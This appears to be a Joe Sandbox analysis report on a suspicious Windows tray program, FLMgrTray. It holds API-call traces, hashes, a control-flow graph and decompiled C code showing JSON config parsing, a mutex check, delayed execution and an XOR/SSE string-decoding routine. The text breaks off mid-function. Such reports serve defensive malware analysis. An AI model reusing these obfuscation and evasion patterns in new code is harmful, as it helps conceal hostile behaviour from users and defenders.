                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,kitid,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174860
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174890
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(logo2,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001748AF
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(logo2,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001748B6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,logo2,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174911
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(LeadSwitch,?,00000000,?,logo2,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174930
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(LeadSwitch,?,00000000,?,logo2,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174937
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,LeadSwitch,?,00000000,?,logo2,?,?,?,?,?,?,?,?,?,00000000), ref: 00174945
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174975
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(FirstCity,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174994
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(FirstCity,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 0017499B
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,FirstCity,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001749A9
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001749D9
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(FirstCityExecute,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001749F8
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(FirstCityExecute,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001749FF
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,FirstCityExecute,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174A0D
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174A3D
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(LockScreen,?,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174A5C
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(LockScreen,?,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174A63
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,LockScreen,?,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174A71
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174AA1
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(SdEnv,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00174AF0
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(SdEnv,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00174AF7
                                                                                        • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,001727D0,013C1C40,00000000,00000000), ref: 00174B2E
                                                                                        • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,0016E9A0,013C1C40,00000000,00000000), ref: 00174B53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Json@@$Value@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$String@V01@_invalid_parameter_noinfo_noreturn$atoi$Reader@_beginthreadex$?parse@Type@1@@ValueValue@2@_memmove
                                                                                        • String ID: F6systray$FirstCity$FirstCityExecute$LeadSwitch$LockScreen$SdEnv$checktime1$checktime2$delaytime2$kitid$logo2$time1$time2
                                                                                        • API String ID: 1963688712-38646199
                                                                                        • Opcode ID: 43eff27566d8832c82fe24cacfcbc104216b0443496dd7929c0e5ccbbcfceaa6
                                                                                        • Instruction ID: 8021916c9d20586eecc9bc9a13fd4f73dbaa5b77828c43e25225299eef788bd4
                                                                                        • Opcode Fuzzy Hash: 43eff27566d8832c82fe24cacfcbc104216b0443496dd7929c0e5ccbbcfceaa6
                                                                                        • Instruction Fuzzy Hash: 95325B71E102448FEB09DB78DD56BADB775AF5A304F10C36AE405B72A2EB309AC1CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 317 16e9a0-16ea01 call 163540 call 16e1b0 322 16ea07-16ea0d 317->322 323 16f4e1-16f4fd call 1755f4 317->323 325 16ea0f-16ea15 322->325 326 16ea1b-16ea27 322->326 325->323 325->326 328 16ea2a-16ea2c 326->328 329 16ea32-16ea5a 328->329 330 16eb89-16ecb5 call 1622d0 call 183ba0 call 1755e6 memset memcpy call 161400 call 161fa0 call 161710 call 161850 call 164b30 call 164c90 328->330 332 16ea64-16ea67 329->332 333 16ea5c-16ea5e 329->333 378 16ecb7-16ed01 call 16c360 call 164bb0 330->378 379 16ed32-16ed86 call 1755ef call 164b40 call 161460 330->379 334 16ea82-16ea99 332->334 335 16ea69-16ea7d 332->335 333->332 338 16eac4-16eac6 334->338 339 16ea9b-16eab3 call 175703 334->339 337 16eb0a-16eb1d atoi 335->337 345 16eb54-16eb57 337->345 346 16eb1f-16eb22 337->346 342 16ead5 338->342 343 16eac8-16ead3 call 175703 338->343 356 16eb83 _invalid_parameter_noinfo_noreturn 339->356 357 16eab9-16eac2 339->357 350 16ead7-16eb07 memcpy 342->350 343->350 345->323 348 16eb5d-16eb69 345->348 352 16eb24-16eb30 346->352 353 16eb4c-16eb4f 346->353 358 16f4d7-16f4de call 175733 348->358 359 16eb6f-16eb7d 348->359 350->337 354 16eb42-16eb49 call 175733 352->354 355 16eb32-16eb40 352->355 353->328 354->353 355->354 355->356 356->330 357->350 358->323 359->356 359->358 378->379 388 16ed03-16ed10 378->388 395 16eea0-16eed3 379->395 396 16ed8c-16ee99 379->396 390 16ed12-16ed20 388->390 391 16ed28-16ed2a call 175733 388->391 390->391 393 16ed22 _invalid_parameter_noinfo_noreturn 390->393 398 16ed2f 391->398 393->391 395->395 397 16eed5-16eee8 OpenMutexA 395->397 396->395 399 16eef3-16eefe Sleep 397->399 400 16eeea-16eef1 CloseHandle 397->400 398->379 401 16ef04-16ef30 call 16b1f0 call 16bc60 399->401 400->401 406 16ef36-16ef5e 401->406 407 16f413-16f453 call 16b200 401->407 409 16ef64-16f07b 406->409 410 16f080-16f0b3 406->410 413 16f4a5-16f4ae 407->413 414 16f455-16f465 407->414 409->410 410->410 412 16f0b5-16f0c8 call 16b6c0 410->412 423 16f0ce-16f177 ??0Value@Json@@QAE@W4ValueType@1@@Z ??0Value@Json@@QAE@_N@Z ??AValue@Json@@QAEAAV01@PBD@Z ??4Value@Json@@QAEAAV01@$$QAV01@@Z ??1Value@Json@@QAE@XZ ??0Value@Json@@QAE@H@Z ??AValue@Json@@QAEAAV01@PBD@Z ??4Value@Json@@QAEAAV01@$$QAV01@@Z ??1Value@Json@@QAE@XZ 412->423 424 16f408-16f40e call 16b610 412->424 413->323 416 16f4b0-16f4bf 413->416 417 16f467-16f475 414->417 418 16f47d-16f49b call 175733 414->418 416->358 420 16f4c1-16f4cf 416->420 417->418 421 16f477 _invalid_parameter_noinfo_noreturn 417->421 418->413 420->358 425 16f4d1 _invalid_parameter_noinfo_noreturn 420->425 421->418 428 16f2e5-16f3ba ??0Value@Json@@QAE@PBD@Z ??AValue@Json@@QAEAAV01@PBD@Z ??4Value@Json@@QAEAAV01@$$QAV01@@Z ??1Value@Json@@QAE@XZ ??0Value@Json@@QAE@ABV01@@Z ??0StyledWriter@Json@@QAE@XZ ?write@StyledWriter@Json@@UAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVValue@2@@Z call 16cab0 ??1Value@Json@@QAE@XZ call 1622d0 call 163540 call 173950 423->428 429 16f17d-16f188 423->429 424->407 425->358 441 16f3bc-16f3c8 428->441 442 16f3ea-16f403 ??1Value@Json@@QAE@XZ 428->442 430 16f2b0-16f2e3 429->430 431 16f18e-16f2aa 429->431 430->428 430->430 431->430 443 16f3e0-16f3e7 call 175733 441->443 444 16f3ca-16f3d8 441->444 442->424 443->442 444->443 446 16f3da _invalid_parameter_noinfo_noreturn 444->446 446->443
                                                                                        C-Code - Quality: 34%
                                                                                        			E0016E9A0(void* __ebx, int __edx, void* __eflags) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				int _v28;
                                                                                        				char _v44;
                                                                                        				char _v56;
                                                                                        				char _v60;
                                                                                        				char _v84;
                                                                                        				char _v92;
                                                                                        				int _v96;
                                                                                        				int _v100;
                                                                                        				int _v104;
                                                                                        				char _v108;
                                                                                        				void* _v116;
                                                                                        				short _v120;
                                                                                        				char _v124;
                                                                                        				char _v132;
                                                                                        				char _v140;
                                                                                        				intOrPtr _v144;
                                                                                        				int _v148;
                                                                                        				char _v164;
                                                                                        				char _v240;
                                                                                        				int _v244;
                                                                                        				char _v248;
                                                                                        				int _v252;
                                                                                        				int _v256;
                                                                                        				int _v260;
                                                                                        				int _v264;
                                                                                        				char _v288;
                                                                                        				char _v292;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t196;
                                                                                        				void* _t201;
                                                                                        				int _t207;
                                                                                        				void* _t209;
                                                                                        				intOrPtr _t213;
                                                                                        				char _t214;
                                                                                        				void* _t223;
                                                                                        				int _t225;
                                                                                        				int _t226;
                                                                                        				void* _t236;
                                                                                        				long _t237;
                                                                                        				long _t240;
                                                                                        				intOrPtr _t245;
                                                                                        				long _t248;
                                                                                        				int _t251;
                                                                                        				int _t252;
                                                                                        				char _t265;
                                                                                        				long _t266;
                                                                                        				intOrPtr _t279;
                                                                                        				long _t301;
                                                                                        				char* _t310;
                                                                                        				signed int _t311;
                                                                                        				void* _t313;
                                                                                        				void* _t316;
                                                                                        				void* _t317;
                                                                                        				long _t319;
                                                                                        				short* _t322;
                                                                                        				signed int _t340;
                                                                                        				int _t344;
                                                                                        				long _t350;
                                                                                        				void* _t351;
                                                                                        				signed int _t352;
                                                                                        				int _t356;
                                                                                        				short* _t378;
                                                                                        				char _t380;
                                                                                        				signed int _t381;
                                                                                        				int _t385;
                                                                                        				long _t388;
                                                                                        				signed int _t389;
                                                                                        				long _t390;
                                                                                        				void* _t391;
                                                                                        				void* _t392;
                                                                                        				intOrPtr _t399;
                                                                                        				void* _t400;
                                                                                        				void* _t402;
                                                                                        				signed int _t405;
                                                                                        				intOrPtr _t406;
                                                                                        				void* _t407;
                                                                                        				void* _t411;
                                                                                        				void* _t412;
                                                                                        				intOrPtr _t414;
                                                                                        				long _t416;
                                                                                        				void* _t417;
                                                                                        				short _t419;
                                                                                        				void* _t420;
                                                                                        				intOrPtr _t421;
                                                                                        				signed int _t423;
                                                                                        				int _t424;
                                                                                        				signed int _t425;
                                                                                        				void* _t426;
                                                                                        				short* _t428;
                                                                                        				void* _t429;
                                                                                        				void* _t430;
                                                                                        				void* _t431;
                                                                                        				void* _t432;
                                                                                        				void* _t434;
                                                                                        				short* _t435;
                                                                                        				void* _t436;
                                                                                        				void* _t438;
                                                                                        				void* _t439;
                                                                                        
                                                                                        				_t436 = __eflags;
                                                                                        				_t395 = __edx;
                                                                                        				_t321 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_t196 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v20 = _t196 ^ _t425;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t428 = _t426 - 0xfc;
                                                                                        				_t322 = _t428;
                                                                                        				 *(_t322 + 0x10) = 0;
                                                                                        				 *((intOrPtr*)(_t322 + 0x14)) = 7;
                                                                                        				 *_t322 = 0;
                                                                                        				E00163540(__ebx, __edx, _t412, L"lastrpt"); // executed
                                                                                        				_t201 = E0016E1B0(__ebx, __edx, _t412, _t436, 7,  *0x19d024, _t196 ^ _t425, _t412, _t417,  *[fs:0x0], E0018D563); // executed
                                                                                        				_t429 = _t428 + 0x1c;
                                                                                        				if(_t201 != 0) {
                                                                                        					L64:
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					__eflags = _v20 ^ _t425;
                                                                                        					return E001755F4(_v20 ^ _t425);
                                                                                        				}
                                                                                        				_t438 =  *0x19dbc4 - _t201; // 0x0
                                                                                        				if(_t438 == 0) {
                                                                                        					L3:
                                                                                        					_t419 =  *0x19dbdc; // 0x0
                                                                                        					_t414 =  *0x19dbd8; // 0x0
                                                                                        					_v120 = _t419;
                                                                                        					while(_t414 != _t419) {
                                                                                        						if(_t389 >= 0x10) {
                                                                                        							_t423 = _t389 | 0x0000000f;
                                                                                        							__eflags = _t423 - 0x7fffffff;
                                                                                        							_t424 =  >  ? _t395 : _t423;
                                                                                        							_t390 = _t424 + 1;
                                                                                        							__eflags = _t390 - 0x1000;
                                                                                        							if(_t390 < 0x1000) {
                                                                                        								__eflags = _t390;
                                                                                        								if(_t390 == 0) {
                                                                                        									_t391 = 0;
                                                                                        									__eflags = 0;
                                                                                        								} else {
                                                                                        									_push(_t390);
                                                                                        									_t316 = E00175703();
                                                                                        									_t429 = _t432 + 4;
                                                                                        									_t391 = _t316;
                                                                                        								}
                                                                                        								L15:
                                                                                        								_v116 = _t391;
                                                                                        								memcpy(_t391, _v244, _v264 + 1);
                                                                                        								_t429 = _t429 + 0xc;
                                                                                        								_v100 = _v264;
                                                                                        								__eflags = _t424 - 0x10;
                                                                                        								_v96 = _t424;
                                                                                        								_t310 =  >=  ? _v116 :  &_v116;
                                                                                        								_t419 = _v120;
                                                                                        								goto L16;
                                                                                        							}
                                                                                        							_t317 = _t390 + 0x23;
                                                                                        							__eflags = _t317 - _t390;
                                                                                        							_t318 =  <=  ? 0xffffffff : _t317;
                                                                                        							_push( <=  ? 0xffffffff : _t317);
                                                                                        							_t319 = E00175703();
                                                                                        							_t429 = _t432 + 4;
                                                                                        							__eflags = _t319;
                                                                                        							if(_t319 == 0) {
                                                                                        								goto L25;
                                                                                        							} else {
                                                                                        								_t18 = _t319 + 0x23; // 0x23
                                                                                        								_t391 = _t18 & 0xffffffe0;
                                                                                        								 *(_t391 - 4) = _t319;
                                                                                        								goto L15;
                                                                                        							}
                                                                                        						} else {
                                                                                        							asm("movups xmm0, [eax]");
                                                                                        							_v100 = _t389;
                                                                                        							_t310 =  &_v116;
                                                                                        							_v96 = 0xf;
                                                                                        							asm("movups [ebp-0x70], xmm0");
                                                                                        							L16:
                                                                                        							_t311 = atoi(_t310);
                                                                                        							_t395 = _v96;
                                                                                        							_t432 = _t429 + 4;
                                                                                        							if(( *0x19dbd4 & _t311) != 0) {
                                                                                        								__eflags = _t395 - 0x10;
                                                                                        								if(_t395 < 0x10) {
                                                                                        									goto L64;
                                                                                        								}
                                                                                        								_t351 = _v116;
                                                                                        								_t400 = _t395 + 1;
                                                                                        								_t245 = _t351;
                                                                                        								__eflags = _t400 - 0x1000;
                                                                                        								if(_t400 < 0x1000) {
                                                                                        									L63:
                                                                                        									_push(_t400);
                                                                                        									E00175733(_t245, _t351);
                                                                                        									goto L64;
                                                                                        								}
                                                                                        								_t351 =  *((intOrPtr*)(_t351 - 4));
                                                                                        								_t400 = _t400 + 0x23;
                                                                                        								_t245 = _t245 - _t351 + 0xfffffffc;
                                                                                        								__eflags = _t245 - 0x1f;
                                                                                        								if(_t245 <= 0x1f) {
                                                                                        									goto L63;
                                                                                        								}
                                                                                        								L25:
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								break;
                                                                                        							}
                                                                                        							if(_t395 < 0x10) {
                                                                                        								L21:
                                                                                        								_t414 = _t414 + 0x18;
                                                                                        								continue;
                                                                                        							}
                                                                                        							_t392 = _v116;
                                                                                        							_t395 = _t395 + 1;
                                                                                        							_t313 = _t392;
                                                                                        							if(_t395 < 0x1000) {
                                                                                        								L20:
                                                                                        								_push(_t395);
                                                                                        								E00175733(_t313, _t392);
                                                                                        								_t429 = _t432 + 8;
                                                                                        								goto L21;
                                                                                        							}
                                                                                        							_t392 =  *(_t392 - 4);
                                                                                        							_t395 = _t395 + 0x23;
                                                                                        							if(_t313 > 0x1f) {
                                                                                        								goto L25;
                                                                                        							}
                                                                                        							goto L20;
                                                                                        						}
                                                                                        					}
                                                                                        					_t430 = _t429 - 0x18;
                                                                                        					E001622D0(_t430, 0x19d028);
                                                                                        					_push( &_v164); // executed
                                                                                        					E00183BA0(_t321, _t414, __eflags); // executed
                                                                                        					_v8 = 0;
                                                                                        					_v260 = 0;
                                                                                        					_v256 = 0;
                                                                                        					_v252 = 0;
                                                                                        					_t207 = _v148;
                                                                                        					_v244 = _t207;
                                                                                        					_push(_t207 + 1);
                                                                                        					_v8 = 1;
                                                                                        					_t209 = E001755E6(); // executed
                                                                                        					_t420 = _t209;
                                                                                        					memset(_t420, 0, _v244 + 1);
                                                                                        					__eflags = _v144 - 0x10;
                                                                                        					_t331 =  >=  ? _v164 :  &_v164;
                                                                                        					memcpy(_t420,  >=  ? _v164 :  &_v164, _v244);
                                                                                        					_t431 = _t430 + 0x38;
                                                                                        					E00161400( &_v292, _t395, __eflags, 0x20, 1, 0);
                                                                                        					asm("movups xmm0, [0x190684]");
                                                                                        					_t213 =  *0x1906a4; // 0x444724
                                                                                        					_v24 = _t213;
                                                                                        					_t214 =  *0x1906c8; // 0x0
                                                                                        					asm("movups [ebp-0x34], xmm0");
                                                                                        					_v60 = _t214;
                                                                                        					asm("movups xmm0, [0x190694]");
                                                                                        					_v8 = 2;
                                                                                        					asm("movups [ebp-0x24], xmm0");
                                                                                        					asm("movups xmm0, [0x1906a8]");
                                                                                        					asm("movups [ebp-0x58], xmm0");
                                                                                        					asm("movups xmm0, [0x1906b8]");
                                                                                        					asm("movups [ebp-0x48], xmm0");
                                                                                        					E00161FA0( &_v292,  &_v56);
                                                                                        					E00161710( &_v292, _t420, _v244,  &_v92);
                                                                                        					E00161850( &_v292, _t420,  &_v244);
                                                                                        					E00164B30( &_v124);
                                                                                        					_v8 = 3;
                                                                                        					__eflags = E00164C90( &_v124);
                                                                                        					if(__eflags == 0) {
                                                                                        						L32:
                                                                                        						_push(_t420); // executed
                                                                                        						L001755EF(); // executed
                                                                                        						_t432 = _t431 + 4;
                                                                                        						_t223 = E00164B40( &_v124);
                                                                                        						_v8 = 1;
                                                                                        						E00161460(_t223,  &_v292);
                                                                                        						_t225 =  *0x190710; // 0x5b455915
                                                                                        						_t340 = 0;
                                                                                        						asm("movq xmm0, [0x190708]");
                                                                                        						_t421 =  *0x19dc40; // 0x5
                                                                                        						_v100 = _t225;
                                                                                        						_t226 =  *0x190714; // 0x3f
                                                                                        						_v96 = _t226;
                                                                                        						asm("movq [ebp-0x68], xmm0");
                                                                                        						_v244 = 0;
                                                                                        						__eflags = _t421 - 2;
                                                                                        						if(_t421 >= 2) {
                                                                                        							asm("movaps xmm2, [0x18ffd0]");
                                                                                        							_t340 = 8;
                                                                                        							asm("movaps xmm4, [0x190d30]");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("movd xmm5, edi");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movd xmm6, eax");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							_v244 = 8;
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("movaps xmm2, [0x18ffe0]");
                                                                                        							asm("paddd xmm2, [0x18ffd0]");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("pand xmm1, [0x190d10]");
                                                                                        							asm("movd xmm0, dword [0x190708]");
                                                                                        							asm("packuswb xmm1, xmm1");
                                                                                        							asm("paddb xmm1, [0x190d20]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("movd [ebp-0x68], xmm1");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("pand xmm1, [0x190d10]");
                                                                                        							asm("movd xmm0, dword [ebp-0x64]");
                                                                                        							asm("packuswb xmm1, xmm1");
                                                                                        							asm("paddb xmm1, [0x190d20]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movd [ebp-0x64], xmm1");
                                                                                        						}
                                                                                        						do {
                                                                                        							_t344 = _v244;
                                                                                        							 *(_t425 + _t344 - 0x68) =  *(_t425 + _t344 - 0x68) ^ 0x33 + _t344;
                                                                                        							_t340 = _t344 + 1;
                                                                                        							_v244 = _t340;
                                                                                        							__eflags = _t340 - 0xd;
                                                                                        						} while (_t340 < 0xd);
                                                                                        						_t236 = OpenMutexA(0x1f0001, 0,  &_v108);
                                                                                        						__eflags = _t236;
                                                                                        						if(_t236 == 0) {
                                                                                        							_t237 =  *0x19dbb8 * 0xea60;
                                                                                        							__eflags = _t237;
                                                                                        							Sleep(_t237); // executed
                                                                                        						} else {
                                                                                        							CloseHandle(_t236);
                                                                                        						}
                                                                                        						E0016B1F0( &_v248);
                                                                                        						_v8 = 5;
                                                                                        						_t240 = E0016BC60(_v260, _v256 - _v260);
                                                                                        						__eflags = _t240;
                                                                                        						if(_t240 == 0) {
                                                                                        							L54:
                                                                                        							__eflags = _v144 - 0x10;
                                                                                        							_v256 = _v260;
                                                                                        							_t243 =  >=  ? _v164 :  &_v164;
                                                                                        							_v148 = 0;
                                                                                        							 *( >=  ? _v164 :  &_v164) = 0;
                                                                                        							E0016B200( &_v248);
                                                                                        							_t350 = _v260;
                                                                                        							__eflags = _t350;
                                                                                        							if(_t350 != 0) {
                                                                                        								_t248 = _t350;
                                                                                        								_t402 = _v252 - _t350;
                                                                                        								__eflags = _t402 - 0x1000;
                                                                                        								if(_t402 >= 0x1000) {
                                                                                        									_t350 =  *(_t350 - 4);
                                                                                        									_t402 = _t402 + 0x23;
                                                                                        									_t248 = _t248 - _t350 + 0xfffffffc;
                                                                                        									__eflags = _t248 - 0x1f;
                                                                                        									if(_t248 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								_push(_t402);
                                                                                        								E00175733(_t248, _t350);
                                                                                        								_t432 = _t432 + 8;
                                                                                        								_v260 = 0;
                                                                                        								_v256 = 0;
                                                                                        								_v252 = 0;
                                                                                        							}
                                                                                        							_t399 = _v144;
                                                                                        							__eflags = _t399 - 0x10;
                                                                                        							if(_t399 < 0x10) {
                                                                                        								goto L64;
                                                                                        							} else {
                                                                                        								_t351 = _v164;
                                                                                        								_t400 = _t399 + 1;
                                                                                        								_t245 = _t351;
                                                                                        								__eflags = _t400 - 0x1000;
                                                                                        								if(_t400 >= 0x1000) {
                                                                                        									_t351 =  *((intOrPtr*)(_t351 - 4));
                                                                                        									_t400 = _t400 + 0x23;
                                                                                        									_t245 = _t245 - _t351 + 0xfffffffc;
                                                                                        									__eflags = _t245 - 0x1f;
                                                                                        									if(_t245 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								goto L63;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t251 =  *0x190720; // 0x4a4f534b
                                                                                        							_t352 = 0;
                                                                                        							asm("movq xmm0, [0x190718]");
                                                                                        							_v100 = _t251;
                                                                                        							_t252 =  *0x190724; // 0x3f
                                                                                        							asm("movq [ebp-0x68], xmm0");
                                                                                        							_v96 = _t252;
                                                                                        							_v244 = 0;
                                                                                        							__eflags = _t421 - 2;
                                                                                        							if(_t421 >= 2) {
                                                                                        								asm("movaps xmm2, [0x18ffd0]");
                                                                                        								asm("movaps xmm5, [0x190d30]");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								_t352 = 8;
                                                                                        								asm("pmuldq xmm0, xmm5");
                                                                                        								asm("pmuldq xmm1, xmm5");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("movd xmm6, edi");
                                                                                        								asm("psrad xmm1, xmm6");
                                                                                        								asm("movd xmm7, eax");
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								_v244 = 8;
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, [0x190d00]");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("movaps xmm2, [0x18ffe0]");
                                                                                        								asm("paddd xmm2, [0x18ffd0]");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, eax");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [0x190718]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("movd [ebp-0x68], xmm1");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								asm("pmuldq xmm0, xmm5");
                                                                                        								asm("pmuldq xmm1, xmm5");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("psrad xmm1, xmm6");
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, [0x190d00]");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
